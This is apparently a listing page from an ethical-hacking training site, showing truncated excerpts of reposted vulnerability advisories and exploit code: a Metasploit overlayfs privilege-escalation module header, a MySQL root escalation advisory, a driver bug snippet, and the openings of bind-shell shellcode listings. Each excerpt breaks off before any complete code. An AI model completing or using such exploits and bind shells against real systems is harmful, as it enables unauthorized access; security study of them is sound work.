Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: Yakov Shafranovich
Summary
Android devices can be crashed forcing a halt and then a soft reboot
by downloading a large proxy auto config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker that can intercept and replace the PAC file. However, the […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: SkyLined
Synopsis
A specially crafted HTTP response can cause the CHttpHeaderParser::ParseStatusLine method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
You might have heard about the IP address 0.0.0.0 but never thought much about it. Some of you would be knowing that it’s a ‘no particular address’ placeholder’. But, what else? What does it really mean in different situations? Well, here I’ll try to answer these […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Protecting your Windows machine with a password is a must. It’s a great layer of security disabling unauthorized people from using your computer. But there are times when your own security layer restricts you from using your Windows OS. Probably, because you aren’t worthy of […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require “msf/core”
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Overlayfs Privilege Escalation’,
‘Description’ => %q{
This module attempts to exploit two different CVEs related to overlayfs.
CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
3.16.0-25 […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: Dawid
I. VULNERABILITY
————————-
MariaDB / MySQL / PerconaDB – Root Privilege Escalation
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
MariaDB
All current
Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8
Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0
II. BACKGROUND
————————-
MySQL:
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
In this particular routine,
if ( cur->image_names_count > 0 ) {
// info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
image_filename = info_->ImageFileName;
buf = image_filename->Buffer;
if ( buf )
{
if ( !v5 )
{
i = 0i64;
num_chars = image_filename->Length […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: CripSlick
#include <stdio.h>
#include <string.h>
//|=========================================================================================
//|=============== CripSlick’s Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C “fork”
#include <stdlib.h> //| needed for C “system”
//|=====================================================================================================
//|================================ CripSlick’s Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick’s NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: Brother Roziul Hasan Khan
/*
# Title : Windows x86 password protected bind shell tcp shellcode
# size : 637 bytes
# Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 99 cltd
1: 64 8b 42 30 mov %fs:0x30(%edx),%eax
5: 8b 40 0c mov 0xc(%eax),%eax
8: 8b […]